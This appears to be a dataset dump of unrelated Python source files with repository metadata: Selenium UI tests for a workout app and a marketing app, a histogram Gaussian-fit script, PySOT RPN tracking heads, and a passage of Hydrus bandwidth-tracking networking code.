self.assertIn('67890', self.browser.page_source)
#now check we can navigate to a workout directly
self.browser.get(self.live_server_url + '/workout/1/')
body = self.browser.find_element_by_tag_name('body')
#and that all the details are still correct
self.assertIn('Jumping', body.text)
self.assertIn('Length', body.text)
self.assertIn('12345', self.browser.page_source)
#now check we can update the result for one of the measures
result_field = self.browser.find_element_by_name('Length')
result_field.clear()
result_field.send_keys('345678')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#and that if we revisit the page the change stuck
self.browser.get(self.live_server_url + '/workout/1/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Jumping', body.text)
self.assertIn('Length', body.text)
self.assertIn('345678', self.browser.page_source)
#then go back to homepage
self.browser.find_element_by_link_text("Home").click()
#and follow the add link to create a new workout
self.browser.find_element_by_link_text("Add").click()
#choose the second type of exercise
self.browser.find_element_by_xpath("//select/option[@value='2']").click()
self.browser.find_element_by_link_text("Today").click()
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#we should have been taken to the result editing page and be presented with appropriate choices
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Reaching', body.text)
self.assertIn('Width', body.text)
#find the result field and set the result
result_field = self.browser.find_element_by_name('Width')
result_field.clear()
result_field.send_keys('234')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#check it looks like we are back on the homepage
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Workouts', body.text)
self.assertIn('Jumping', body.text)
self.assertIn('Reaching', body.text)
#Now try to follow the link to our new workout
self.browser.find_element_by_link_text("Reaching").click()
#and check the new result was logged
self.assertIn('234', self.browser.page_source)
#now try to add a new workout directly
self.browser.get(self.live_server_url + '/workout/add/')
#give an invalid date
date_field = self.browser.find_element_by_name('time_of_workout')
date_field.clear()
date_field.send_keys('2010-565-23')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Check we were told off for entering an invalid choice
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Enter a valid date', body.text)
#Now go back to the first workout
self.browser.get(self.live_server_url + '/workout/1/')
#And try to alter the score to an invalid one
result_field = self.browser.find_element_by_name('Length')
result_field.clear()
result_field.send_keys('34ss5678')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Check we were told off for entering an invalid choice
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Enter a number', body.text)
#Now go back to the first workout
self.browser.get(self.live_server_url + '/workout/1/')
#And try to delete it
self.browser.find_element_by_link_text("Delete this workout").click()
#Now try to reopen the workout
self.browser.get(self.live_server_url + '/workout/1/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn("That workout doesn't exist", body.text)
#Now try to directly delete a non-existent workout
self.browser.get(self.live_server_url + '/workout/1/delete')
body = self.browser.find_element_by_tag_name('body')
self.assertIn("That workout doesn't exist", body.text)
#Now go to the second workouts edit view
self.browser.get(self.live_server_url + '/workout/2/edit/')
#And try to edit it
date_field = self.browser.find_element_by_name('time_of_workout')
date_field.clear()
date_field.send_keys('2010-06-24')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Now try to reopen the workout and check the date changed
self.browser.get(self.live_server_url + '/workout/2/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn("Thursday 24 June 2010", body.text)
self.assertIn("Reaching", body.text)
#Now go to the second workout
self.browser.get(self.live_server_url + '/workout/2/')
#And try to edit it
self.browser.find_element_by_link_text("Edit this workout").click()
self.browser.find_element_by_xpath("//select/option[@value='1']").click()
date_field = self.browser.find_element_by_name('time_of_workout')
date_field.clear()
date_field.send_keys('2010-06-23')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Now try to reopen the workout and check the date changed
self.browser.get(self.live_server_url + '/workout/2/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn("Wednesday 23 June 2010", body.text)
self.assertIn("Jumping", body.text)
#Now try to follow the Measures Link
self.browser.find_element_by_link_text("Measures").click()
#Check the page shows our existing measures
body = self.browser.find_element_by_tag_name('body')
self.assertIn("Length", body.text)
self.assertIn("Width", body.text)
#Check the page doesn't have a delete facility
self.assertNotIn("Delete", body.text)
#Check it does have an add button/link
self.assertIn("Add measure", body.text)
#follow the link to add a new measure
self.browser.find_element_by_link_text("Add measure").click()
#Try to add a new measure
measure_field = self.browser.find_element_by_name('name')
measure_field.send_keys('Breadth')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Now Navigate back to the measures page and verify that the measure is there
self.browser.get(self.live_server_url + '/measures/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn("Breadth", body.text)
#Now try to visit the Exerices Link
self.browser.find_element_by_link_text("Exercises").click()
#Check the page shows our existing exercises
body = self.browser.find_element_by_tag_name('body')
self.assertIn("Jumping", body.text)
self.assertIn("Reaching", body.text)
#Check the page doesn't have a delete facility
self.assertNotIn("Delete", body.text)
#Check it does have an add button/link
self.assertIn("Add exercise", body.text)
#follow the link to add a new exercise
self.browser.find_element_by_link_text("Add exercise").click()
#Try to add a new exercise
exercise_field = self.browser.find_element_by_name('name')
exercise_field.send_keys('Stretching')
self.browser.find_element_by_xpath("//input[@value='2']").click()
self.browser.find_element_by_xpath("//input[@value='3']").click()
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Now Navigate back to the exercises page and verify that the exercise is there
self.browser.get(self.live_server_url + '/exercises/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Stretching', body.text)
#Now let's add a new workout with our new exercise and measure
self.browser.find_element_by_link_text("Add").click()
self.browser.find_element_by_xpath("//select/option[@value='3']").click()
self.browser.find_element_by_link_text("Today").click()
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#we should have been taken to the result editing page and be presented with appropriate choices
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Stretching', body.text)
self.assertIn('Breadth', body.text)
self.assertIn('Width', body.text)
self.assertNotIn('Length', body.text)
#find the result field and set the result
result_field = self.browser.find_element_by_name('Width')
result_field.clear()
result_field.send_keys('234')
result_field = self.browser.find_element_by_name('Breadth')
result_field.clear()
result_field.send_keys('345')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Now Navigate back to the exercises page and then click the link for our first exercise
self.browser.get(self.live_server_url + '/exercises/')
self.browser.find_element_by_link_text("Stretching").click()
#The page should have details of our exercise
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Stretching', body.text)
self.assertIn('Width', body.text)
self.assertIn('234', body.text)
self.assertIn('Breadth', body.text)
self.assertIn('345', body.text)
#Now go to workout 4 and check we have a link back to the exercise page
self.browser.get(self.live_server_url + '/workout/4/')
self.browser.find_element_by_link_text("Stretching").click()
|
[
"phil@parsons.uk.com"
] |
phil@parsons.uk.com
|
d6d72b632eee1e7e11f2658e74868cd2b2f3ef7a
|
e3be689445fb37a275bf003240738ab7311445e0
|
/hist-gauss/hist.py
|
6fbe60ad944253f4cad4e6ef3138268564064a74
|
[] |
no_license
|
dvgreetham/PhD-tools
|
407d6e8dd16023839a556b4e3ce10d1ce90deda9
|
a1bfac1abc7a2464dcb3d000d33636c863136c62
|
refs/heads/master
| 2020-05-17T03:00:38.024971
| 2019-02-05T11:05:23
| 2019-02-05T11:05:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,401
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 14 10:43:45 2018
@author: goranbs
compute, plot and write the histogram of a dataset
"""
import sys
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
# ------------------------------------------------ #
if len(sys.argv) < 3:
print "\nRead columnar data set to compute histogram"
print "Useage: hist.py filename colnr [nbins]\n"
print "lines ignored in 'filename' starts with: #"
print "filename : data file with columnar data"
print "colnr : column to use in data set from file 'filename'"
print "nbins : number of bins used in histogram [default nbins=100]"
sys.exit()
# ------------------------------------------------ #
name = sys.argv[1]
colnr = int(sys.argv[2]) - 1
try:
nbins = int(sys.argv[3])
except:
nbins = 100
#print name, colnr, nbins
def write_data(x,y,gauss_fit,popt):
pref = name[:name.rfind(".")]
outfile = pref + '.out'
fopen = open(outfile,'w')
header = "# hist.py name={} colnr={} nbins={}\n".format(name,(colnr+1),nbins)
subhead1 = "# Gaussian fit: a0={} mean={} sigma={}\n".format(popt[0],popt[1],popt[2])
subhead2 = "# x count gauss_fit\n"
fopen.write(header)
fopen.write(subhead1)
fopen.write(subhead2)
for i in xrange(len(x)):
fopen.write("{:f} {:f} {:f}\n".format(x[i],y[i],gauss_fit[i]))
fopen.close()
def gauss(x,a,x0,sigma):
return a*np.exp(-(x-x0)**2/(2*sigma**2))
# -- do the magic
data = np.loadtxt(fname=name,comments='#')
data = data[:,colnr]
hist, bin_edges = np.histogram(data,bins=nbins,normed=False)
# -- initial guess for the gaussian
a_0=1
mean_0=1
sigma_0=1
#print np.shape(hist), np.shape(bin_edges)
# -- curve fit
delta=bin_edges[1]-bin_edges[0]
bin_centers=(bin_edges[:-1]+delta)
popt, pcov = curve_fit(gauss,bin_centers,hist,p0=[a_0,mean_0,sigma_0])
print '--'*20
print 'gaussian fit:'
print ['a0','mean','sigma']
print popt
print '--'*20
plotting='no'
if plotting=='yes':
plt.figure()
plt.hist(data, bins=nbins, normed=False, label='hist')
plt.plot(bin_centers, gauss(bin_centers,*popt), '--', label='gauss')
plt.xlabel('x')
plt.ylabel('count')
plt.legend()
plt.show()
write_data(bin_centers,hist,gauss(bin_centers,*popt),popt)
# ------------------------------------------------------- EOF
|
[
"g.svaland15@imperial.ac.uk"
] |
g.svaland15@imperial.ac.uk
|
2681855eee69bd7b63dea1ac73d3aa9a3853b399
|
4ba091b217faddd0ee053c6f5f49547a3fc2713d
|
/big_feature/pysot/models/head/rpn.py
|
3ab768d43d54393a17e89c04725fc93ae0269920
|
[] |
no_license
|
Catchen98/SOT-Projects
|
98cb90058c288596dbf516004777553e176a5250
|
352f43cd7d615fbdb08246fad9aefee03beca9e3
|
refs/heads/master
| 2022-12-19T00:56:43.095395
| 2020-09-17T13:30:23
| 2020-09-17T13:30:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,485
|
py
|
# Copyright (c) SenseTime. All Rights Reserved.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import torch
import torch.nn as nn
import torch.nn.functional as F
import os
from pysot.core.xcorr import xcorr_fast, xcorr_depthwise
from pysot.models.init_weight import init_weights
class RPN(nn.Module):
def __init__(self):
super(RPN, self).__init__()
def forward(self, z_f, x_f):
raise NotImplementedError
class UPChannelRPN(RPN):
def __init__(self, anchor_num=5, feature_in=256):
super(UPChannelRPN, self).__init__()
cls_output = 2 * anchor_num
loc_output = 4 * anchor_num
self.template_cls_conv = nn.Conv2d(feature_in,
feature_in * cls_output, kernel_size=3)
self.template_loc_conv = nn.Conv2d(feature_in,
feature_in * loc_output, kernel_size=3)
self.search_cls_conv = nn.Conv2d(feature_in,
feature_in, kernel_size=3)
self.search_loc_conv = nn.Conv2d(feature_in,
feature_in, kernel_size=3)
self.loc_adjust = nn.Conv2d(loc_output, loc_output, kernel_size=1)
def forward(self, z_f, x_f):
cls_kernel = self.template_cls_conv(z_f)
loc_kernel = self.template_loc_conv(z_f)
cls_feature = self.search_cls_conv(x_f)
loc_feature = self.search_loc_conv(x_f)
cls = xcorr_fast(cls_feature, cls_kernel)
loc = self.loc_adjust(xcorr_fast(loc_feature, loc_kernel))
return cls, loc
class DepthwiseXCorr(nn.Module):
def __init__(self, in_channels, hidden, out_channels, kernel_size=3, hidden_kernel_size=5):
super(DepthwiseXCorr, self).__init__()
self.conv_kernel = nn.Sequential(
nn.Conv2d(in_channels, hidden, kernel_size=kernel_size, bias=False),
nn.BatchNorm2d(hidden),
nn.ReLU(inplace=True),
)
self.conv_search = nn.Sequential(
nn.Conv2d(in_channels, hidden, kernel_size=kernel_size, bias=False),
nn.BatchNorm2d(hidden),
nn.ReLU(inplace=True),
)
self.head = nn.Sequential(
nn.Conv2d(hidden, hidden, kernel_size=1, bias=False),
nn.BatchNorm2d(hidden),
nn.ReLU(inplace=True),
nn.Conv2d(hidden, out_channels, kernel_size=1)
)
def forward(self, kernel, search):
kernel = self.conv_kernel(kernel)
search = self.conv_search(search)
feature = xcorr_depthwise(search, kernel)
out = self.head(feature)
return out, kernel, search
class DepthwiseRPN(RPN):
def __init__(self, anchor_num=5, in_channels=256, out_channels=256):
super(DepthwiseRPN, self).__init__()
self.cls = DepthwiseXCorr(in_channels, out_channels, 2 * anchor_num)
self.loc = DepthwiseXCorr(in_channels, out_channels, 4 * anchor_num)
def forward(self, z_f, x_f):
cls, kernel, cls_feature = self.cls(z_f, x_f)
loc, _, _ = self.loc(z_f, x_f)
return cls, loc
class MultiRPN(RPN):
def __init__(self, anchor_num, in_channels, weighted=False):
super(MultiRPN, self).__init__()
self.weighted = weighted
for i in range(len(in_channels)):
self.add_module('rpn'+str(i+2),
DepthwiseRPN(anchor_num, in_channels[i]//2, in_channels[i]//2))
if self.weighted:
self.cls_weight = nn.Parameter(torch.ones(len(in_channels)))
self.loc_weight = nn.Parameter(torch.ones(len(in_channels)))
def forward(self, z_fs, x_fs):
cls = []
loc = []
for idx, (z_f, x_f) in enumerate(zip(z_fs, x_fs), start=2):
rpn = getattr(self, 'rpn'+str(idx))
c, l = rpn(z_f, x_f)
cls.append(c)
loc.append(l)
if self.weighted:
cls_weight = F.softmax(self.cls_weight, 0)
loc_weight = F.softmax(self.loc_weight, 0)
def avg(lst):
return sum(lst) / len(lst)
def weighted_avg(lst, weight):
s = 0
for i in range(len(weight)):
s += lst[i] * weight[i]
return s
if self.weighted:
return weighted_avg(cls, cls_weight), weighted_avg(loc, loc_weight)
else:
return avg(cls), avg(loc)
|
[
"1850357388@qq.com"
] |
1850357388@qq.com
|
f7afa319768395b6eef4accf776458d254625b6a
|
4a9995871447a406a7e6307a030503700cd41226
|
/script/testCase/Y3me้กน็ฎ/ๆฐๅญๅๅปบๆจก/ไผๅไธญๅฟ/ๆ ็ญพๅ็ฑป.py
|
1085b33fd1c37f473f55bd6f1171e6c1ce96626a
|
[] |
no_license
|
juntaoh1234/12122003
|
96a107ce22d930e8d9517810736d8f6ce92dc7ad
|
4bee39286c3708d7a0df3001e0daa9da51478170
|
refs/heads/master
| 2020-10-01T18:20:01.572599
| 2019-12-12T12:04:08
| 2019-12-12T12:04:08
| 227,596,967
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,973
|
py
|
# coding=utf-8
from time import time, sleep
from SRC.common.decorator import codeException_dec
from SRC.unittest.case import TestCase
from script.common import utils
from selenium import webdriver
from selenium.webdriver import ActionChains
class EasyCase(TestCase):
def __init__(self, webDriver, paramsList):
# ่ฏทไธ่ฆไฟฎๆน่ฏฅๆนๆณ124421
super(EasyCase, self).__init__(webDriver, paramsList)
@codeException_dec('3')
def runTest(self):
driver = self.getDriver()
param = self.param
tool = utils
driver.refresh()
# ๅทฆไธๆนๅ
ฌๅ
ฑ่็น
driver.find_element_by_class_name('lebra-navbar-left-icon').click()
sleep(3)
# ่ฟๅ
ฅ่ดขๅก็ฎก็
driver.find_element_by_xpath('//*[text()="่ฅ้็ฎก็"]').click()
sleep(3)
# ่ฟๅ
ฅไธ็บง่็น
menu2 = driver.find_element_by_css_selector('span[title="ไผๅไธญๅฟ"]')
actions = ActionChains(driver)
actions.move_to_element(menu2)
actions.click(menu2)
actions.perform()
sleep(3)
# ่ฟๅ
ฅไบ็บง่็น
menu3 = driver.find_element_by_css_selector('li[class="bottomBar"][title="ๆ ็ญพๅ็ฑป"]')
actions.move_to_element(menu3)
actions.click(menu3)
actions.perform()
sleep(3)
titleName = driver.find_element_by_css_selector(
'#home_header > div > div.tab--38iB- > ul > li > p').get_attribute('title')
assert u"ๆ ็ญพๅ็ฑป" in titleName, u"้กต้ขๆบ็ ไธญไธๅญๅจ่ฏฅๅ
ณ้ฎๅญ๏ผ"
sleep(3)
iframe = driver.find_element_by_id('SDMB020401')
driver.switch_to.frame(iframe)
#ๅ ้ค
driver.find_element_by_id('btn_del').click()
sleep(3)
driver.switch_to.default_content()
driver.find_element_by_class_name('u-button').click()
sleep(3)
driver.find_element_by_class_name('u-dropdown-menu-item').click()
sleep(3)
|
[
"1341890679@qq.com"
] |
1341890679@qq.com
|
8ad8ff8a9685b9435f5d29a63a84df3cf8caf11c
|
7198404ed7691e4061f511e35071717ca81254b2
|
/hydrus/core/HydrusNetworking.py
|
0eb37b75f999a972a9ddb676c1c8fd0f3c8a6e0e
|
[
"WTFPL"
] |
permissive
|
seniorm0ment/hydrus
|
d05b0bb83c54c258971fbb0797cbd28565945619
|
78261ecf9e192877013671ed7ee4517da581f900
|
refs/heads/master
| 2023-03-14T15:59:42.386590
| 2021-03-23T21:05:43
| 2021-03-23T21:05:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 30,038
|
py
|
import calendar
import collections
import datetime
import http.client
import json
import psutil
import socket
import threading
import urllib
import urllib3
from urllib3.exceptions import InsecureRequestWarning
urllib3.disable_warnings( InsecureRequestWarning ) # stopping log-moaning when request sessions have verify = False
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusExceptions
from hydrus.core import HydrusSerialisable
# The calendar portion of this works in GMT. A new 'day' or 'month' is calculated based on GMT time, so it won't tick over at midnight for most people.
# But this means a server can pass a bandwidth object to a lad and everyone can agree on when a new day is.
def ConvertBandwidthRuleToString( rule ):
( bandwidth_type, time_delta, max_allowed ) = rule
if max_allowed == 0:
return 'No requests currently permitted.'
if bandwidth_type == HC.BANDWIDTH_TYPE_DATA:
s = HydrusData.ToHumanBytes( max_allowed )
elif bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS:
s = HydrusData.ToHumanInt( max_allowed ) + ' rqs'
if time_delta is None:
s += ' per month'
else:
s += ' per ' + HydrusData.TimeDeltaToPrettyTimeDelta( time_delta )
return s
def LocalPortInUse( port ):
if HC.PLATFORM_WINDOWS:
for sconn in psutil.net_connections():
if port == sconn.laddr[1] and sconn.status in ( 'ESTABLISHED', 'LISTEN' ): # local address: ( ip, port )
return True
return False
else:
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.settimeout( 0.2 )
result = s.connect_ex( ( '127.0.0.1', port ) )
s.close()
CONNECTION_SUCCESS = 0
return result == CONNECTION_SUCCESS
def ParseTwistedRequestGETArgs( requests_args, int_params, byte_params, string_params, json_params, json_byte_list_params ):
args = ParsedRequestArguments()
for name_bytes in requests_args:
values_bytes = requests_args[ name_bytes ]
try:
name = str( name_bytes, 'utf-8' )
except UnicodeDecodeError:
continue
value_bytes = values_bytes[0]
try:
value = str( value_bytes, 'utf-8' )
except UnicodeDecodeError:
continue
if name in int_params:
try:
args[ name ] = int( value )
except:
raise HydrusExceptions.BadRequestException( 'I was expecting to parse \'' + name + '\' as an integer, but it failed.' )
elif name in byte_params:
try:
args[ name ] = bytes.fromhex( value )
except:
raise HydrusExceptions.BadRequestException( 'I was expecting to parse \'' + name + '\' as a hex string, but it failed.' )
elif name in string_params:
try:
args[ name ] = urllib.parse.unquote( value )
except:
raise HydrusExceptions.BadRequestException( 'I was expecting to parse \'' + name + '\' as a percent-encdode string, but it failed.' )
elif name in json_params:
try:
args[ name ] = json.loads( urllib.parse.unquote( value ) )
except:
raise HydrusExceptions.BadRequestException( 'I was expecting to parse \'' + name + '\' as a json-encoded string, but it failed.' )
elif name in json_byte_list_params:
try:
list_of_hex_strings = json.loads( urllib.parse.unquote( value ) )
args[ name ] = [ bytes.fromhex( hex_string ) for hex_string in list_of_hex_strings ]
except:
raise HydrusExceptions.BadRequestException( 'I was expecting to parse \'' + name + '\' as a json-encoded hex strings, but it failed.' )
return args
class ParsedRequestArguments( dict ):
def __missing__( self, key ):
raise HydrusExceptions.BadRequestException( 'It looks like the parameter "{}" was missing!'.format( key ) )
def GetValue( self, key, expected_type, default_value = None ):
if key in self:
value = self[ key ]
if not isinstance( value, expected_type ):
error_text_lookup = {}
error_text_lookup[ int ] = 'integer'
error_text_lookup[ str ] = 'string'
error_text_lookup[ bytes ] = 'hex-encoded bytestring'
error_text_lookup[ bool ] = 'boolean'
error_text_lookup[ list ] = 'list'
error_text_lookup[ dict ] = 'object/dict'
if expected_type in error_text_lookup:
type_error_text = error_text_lookup[ expected_type ]
else:
type_error_text = 'unknown!'
raise HydrusExceptions.BadRequestException( 'The parameter "{}" was not the expected type: {}!'.format( key, type_error_text ) )
return value
else:
if default_value is None:
raise HydrusExceptions.BadRequestException( 'The required parameter "{}" was missing!'.format( key ) )
else:
return default_value
class BandwidthRules( HydrusSerialisable.SerialisableBase ):
SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_BANDWIDTH_RULES
SERIALISABLE_NAME = 'Bandwidth Rules'
SERIALISABLE_VERSION = 1
def __init__( self ):
HydrusSerialisable.SerialisableBase.__init__( self )
self._lock = threading.Lock()
self._rules = set()
def _GetSerialisableInfo( self ):
return list( self._rules )
def _InitialiseFromSerialisableInfo( self, serialisable_info ):
# tuples converted to lists via json
self._rules = set( ( tuple( rule_list ) for rule_list in serialisable_info ) )
def AddRule( self, bandwidth_type, time_delta, max_allowed ):
with self._lock:
rule = ( bandwidth_type, time_delta, max_allowed )
self._rules.add( rule )
def CanContinueDownload( self, bandwidth_tracker, threshold = 15 ):
with self._lock:
for ( bandwidth_type, time_delta, max_allowed ) in self._rules:
# Do not stop ongoing just because starts are throttled
requests_rule = bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS
# Do not block an ongoing jpg download because the current month is 100.03% used
wait_is_too_long = time_delta is None or time_delta > threshold
ignore_rule = requests_rule or wait_is_too_long
if ignore_rule:
continue
if bandwidth_tracker.GetUsage( bandwidth_type, time_delta ) >= max_allowed:
return False
return True
def CanDoWork( self, bandwidth_tracker, expected_requests, expected_bytes, threshold = 30 ):
with self._lock:
for ( bandwidth_type, time_delta, max_allowed ) in self._rules:
# Do not prohibit a raft of work starting or continuing because one small rule is over at this current second
if time_delta is not None and time_delta <= threshold:
continue
# we don't want to do a tiny amount of work, we want to do a decent whack
if bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS:
max_allowed -= expected_requests
elif bandwidth_type == HC.BANDWIDTH_TYPE_DATA:
max_allowed -= expected_bytes
if bandwidth_tracker.GetUsage( bandwidth_type, time_delta ) >= max_allowed:
return False
return True
def CanStartRequest( self, bandwidth_tracker, threshold = 5 ):
with self._lock:
for ( bandwidth_type, time_delta, max_allowed ) in self._rules:
# Do not prohibit a new job from starting just because the current download speed is 210/200KB/s
ignore_rule = bandwidth_type == HC.BANDWIDTH_TYPE_DATA and time_delta is not None and time_delta <= threshold
if ignore_rule:
continue
if bandwidth_tracker.GetUsage( bandwidth_type, time_delta ) >= max_allowed:
return False
return True
def GetWaitingEstimate( self, bandwidth_tracker ):
with self._lock:
estimates = []
for ( bandwidth_type, time_delta, max_allowed ) in self._rules:
if bandwidth_tracker.GetUsage( bandwidth_type, time_delta ) >= max_allowed:
estimates.append( bandwidth_tracker.GetWaitingEstimate( bandwidth_type, time_delta, max_allowed ) )
if len( estimates ) == 0:
return 0
else:
return max( estimates )
def GetBandwidthStringsAndGaugeTuples( self, bandwidth_tracker, threshold = 600 ):
with self._lock:
rows = []
rules_sorted = list( self._rules )
def key( rule_tuple ):
( bandwidth_type, time_delta, max_allowed ) = rule_tuple
if time_delta is None:
return -1
else:
return time_delta
rules_sorted.sort( key = key )
for ( bandwidth_type, time_delta, max_allowed ) in rules_sorted:
time_is_less_than_threshold = time_delta is not None and time_delta <= threshold
if time_is_less_than_threshold or max_allowed == 0:
continue
usage = bandwidth_tracker.GetUsage( bandwidth_type, time_delta )
s = 'used '
if bandwidth_type == HC.BANDWIDTH_TYPE_DATA:
s += HydrusData.ConvertValueRangeToBytes( usage, max_allowed )
elif bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS:
s += HydrusData.ConvertValueRangeToPrettyString( usage, max_allowed ) + ' requests'
if time_delta is None:
s += ' this month'
else:
s += ' in the past ' + HydrusData.TimeDeltaToPrettyTimeDelta( time_delta )
rows.append( ( s, ( usage, max_allowed ) ) )
return rows
def GetRules( self ):
with self._lock:
return list( self._rules )
HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_BANDWIDTH_RULES ] = BandwidthRules
class BandwidthTracker( HydrusSerialisable.SerialisableBase ):
SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_BANDWIDTH_TRACKER
SERIALISABLE_NAME = 'Bandwidth Tracker'
SERIALISABLE_VERSION = 1
# I want to track and query using smaller periods even when the total time delta is larger than the next step up to increase granularity
# for instance, querying minutes for 90 mins time delta is more smooth than watching a juddery sliding two hour window
MAX_SECONDS_TIME_DELTA = 240
MAX_MINUTES_TIME_DELTA = 180 * 60
MAX_HOURS_TIME_DELTA = 72 * 3600
MAX_DAYS_TIME_DELTA = 31 * 86400
CACHE_MAINTENANCE_TIME_DELTA = 120
MIN_TIME_DELTA_FOR_USER = 10
def __init__( self ):
HydrusSerialisable.SerialisableBase.__init__( self )
self._lock = threading.Lock()
self._next_cache_maintenance_timestamp = HydrusData.GetNow() + self.CACHE_MAINTENANCE_TIME_DELTA
self._months_bytes = collections.Counter()
self._days_bytes = collections.Counter()
self._hours_bytes = collections.Counter()
self._minutes_bytes = collections.Counter()
self._seconds_bytes = collections.Counter()
self._months_requests = collections.Counter()
self._days_requests = collections.Counter()
self._hours_requests = collections.Counter()
self._minutes_requests = collections.Counter()
self._seconds_requests = collections.Counter()
def _GetSerialisableInfo( self ):
dicts_flat = []
for d in ( self._months_bytes, self._days_bytes, self._hours_bytes, self._minutes_bytes, self._seconds_bytes, self._months_requests, self._days_requests, self._hours_requests, self._minutes_requests, self._seconds_requests ):
dicts_flat.append( list( d.items() ) )
return dicts_flat
def _InitialiseFromSerialisableInfo( self, serialisable_info ):
counters = [ collections.Counter( dict( flat_dict ) ) for flat_dict in serialisable_info ]
# unusual error someone reported by email--it came back an empty list, fugg
if len( counters ) != 10:
return
self._months_bytes = counters[ 0 ]
self._days_bytes = counters[ 1 ]
self._hours_bytes = counters[ 2 ]
self._minutes_bytes = counters[ 3 ]
self._seconds_bytes = counters[ 4 ]
self._months_requests = counters[ 5 ]
self._days_requests = counters[ 6 ]
self._hours_requests = counters[ 7 ]
self._minutes_requests = counters[ 8 ]
self._seconds_requests = counters[ 9 ]
def _GetCurrentDateTime( self ):
# keep getnow in here for the moment to aid in testing, which patches it to do time shifting
return datetime.datetime.utcfromtimestamp( HydrusData.GetNow() )
def _GetWindowAndCounter( self, bandwidth_type, time_delta ):
if bandwidth_type == HC.BANDWIDTH_TYPE_DATA:
if time_delta < self.MAX_SECONDS_TIME_DELTA:
window = 0
counter = self._seconds_bytes
elif time_delta < self.MAX_MINUTES_TIME_DELTA:
window = 59
counter = self._minutes_bytes
elif time_delta < self.MAX_HOURS_TIME_DELTA:
window = 3599
counter = self._hours_bytes
else:
window = 86399
counter = self._days_bytes
elif bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS:
if time_delta < self.MAX_SECONDS_TIME_DELTA:
window = 0
counter = self._seconds_requests
elif time_delta < self.MAX_MINUTES_TIME_DELTA:
window = 59
counter = self._minutes_requests
elif time_delta < self.MAX_HOURS_TIME_DELTA:
window = 3599
counter = self._hours_requests
else:
window = 86399
counter = self._days_requests
return ( window, counter )
def _GetMonthTime( self, dt ):
( year, month ) = ( dt.year, dt.month )
month_dt = datetime.datetime( year, month, 1 )
month_time = int( calendar.timegm( month_dt.timetuple() ) )
return month_time
def _GetRawUsage( self, bandwidth_type, time_delta ):
if time_delta is None:
dt = self._GetCurrentDateTime()
month_time = self._GetMonthTime( dt )
if bandwidth_type == HC.BANDWIDTH_TYPE_DATA:
return self._months_bytes[ month_time ]
elif bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS:
return self._months_requests[ month_time ]
( window, counter ) = self._GetWindowAndCounter( bandwidth_type, time_delta )
if time_delta == 1:
# the case of 1 poses a problem as our min block width is also 1. we can't have a window of 0.1s to make the transition smooth
# if we include the last second's data in an effort to span the whole previous 1000ms, we end up not doing anything until the next second rolls over
# this causes 50% consumption as we consume in the second after the one we verified was clear
# so, let's just check the current second and be happy with it
now = HydrusData.GetNow()
if now in counter:
return counter[ now ]
else:
return 0
else:
# we need the 'window' because this tracks brackets from the first timestamp and we want to include if 'since' lands anywhere in the bracket
# e.g. if it is 1200 and we want the past 1,000, we also need the bracket starting at 0, which will include 200-999
search_time_delta = time_delta + window
now = HydrusData.GetNow()
since = now - search_time_delta
# we test 'now' as upper bound because a lad once had a motherboard reset and lost his clock time, ending up with a lump of data recorded several decades in the future
# I'm pretty sure this ended up in the seconds thing, so all his short-time tests were failing
return sum( ( value for ( timestamp, value ) in counter.items() if since <= timestamp <= now ) )
def _GetTimes( self, dt ):
# collapse each time portion to the latest timestamp it covers
( year, month, day, hour, minute ) = ( dt.year, dt.month, dt.day, dt.hour, dt.minute )
month_dt = datetime.datetime( year, month, 1 )
day_dt = datetime.datetime( year, month, day )
hour_dt = datetime.datetime( year, month, day, hour )
minute_dt = datetime.datetime( year, month, day, hour, minute )
month_time = int( calendar.timegm( month_dt.timetuple() ) )
day_time = int( calendar.timegm( day_dt.timetuple() ) )
hour_time = int( calendar.timegm( hour_dt.timetuple() ) )
minute_time = int( calendar.timegm( minute_dt.timetuple() ) )
second_time = int( calendar.timegm( dt.timetuple() ) )
return ( month_time, day_time, hour_time, minute_time, second_time )
